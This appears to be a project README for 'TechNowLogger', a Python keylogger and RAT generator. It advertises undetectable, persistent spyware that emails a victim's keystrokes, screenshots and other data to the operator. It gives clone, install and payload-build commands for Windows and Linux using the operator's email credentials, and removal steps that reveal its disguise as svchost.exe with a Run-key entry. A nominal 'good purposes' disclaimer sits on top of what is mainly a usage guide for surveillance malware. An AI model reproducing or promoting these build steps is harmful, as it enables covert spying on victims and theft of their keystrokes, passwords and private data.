This small python script can do really awesome work.
TechNowLogger is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.
đź’» This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
- Works on Windows/Linux
- Notify New Victim Via Email
- Undetectable
- Persistence
- Sends Screenshot of Victim PC's Screen via email
- Creates Executable Binary With Zero Dependencies
- Create less size ~ 5mb payload with advance functionality
- Python 3.X
- Few External Modules
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git
# Go into the repository
$ cd technowlogger
# Installing dependencies
$ python -m pip install -r requirements.txt
$ chmod +x paygen.py
$ ./technowgen.py --help or python technowgen.py --help
# Making Payload/RAT
$ python technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git
# Go into the repository
$ cd technowlogger
# Installing dependencies
$ python -m pip install -r requirements.txt
# Open technowgen.py in Text editor and Configure Line 7 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"
# Getting Help Menu
$ python technowgen.py --help
# Making Payload/RAT
$ python technowgen.py -e [email protected] -p YourEmailPass -w -o output_file_name
- Go to start, type regedit and run the first program, this will open the registry editor.
- Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called svchost, right click this entry and select Delete.
- Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
- Restart the System.
- All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.
- Add New features
- Contribute GUI Version